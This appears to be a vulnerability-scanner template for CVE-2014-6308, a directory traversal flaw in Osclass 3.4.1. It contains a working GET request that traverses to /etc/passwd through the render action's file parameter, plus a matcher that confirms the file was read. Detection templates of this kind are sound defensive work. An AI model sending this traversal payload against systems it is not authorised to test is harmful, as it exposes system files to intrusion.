2021-07-21 01:05:30 +00:00
id : CVE-2014-6308
info :
name : Osclass Security Advisory 3.4.1 - Local File Inclusion
author : daffainfo
severity : high
reference : https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
tags : cve,cve2014,lfi
2021-09-10 11:26:40 +00:00
description : "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php."
2021-07-21 01:05:30 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2021-07-25 23:55:17 +00:00
- "root:.*:0:0"
2021-07-21 01:05:30 +00:00
- type : status
status :
- 200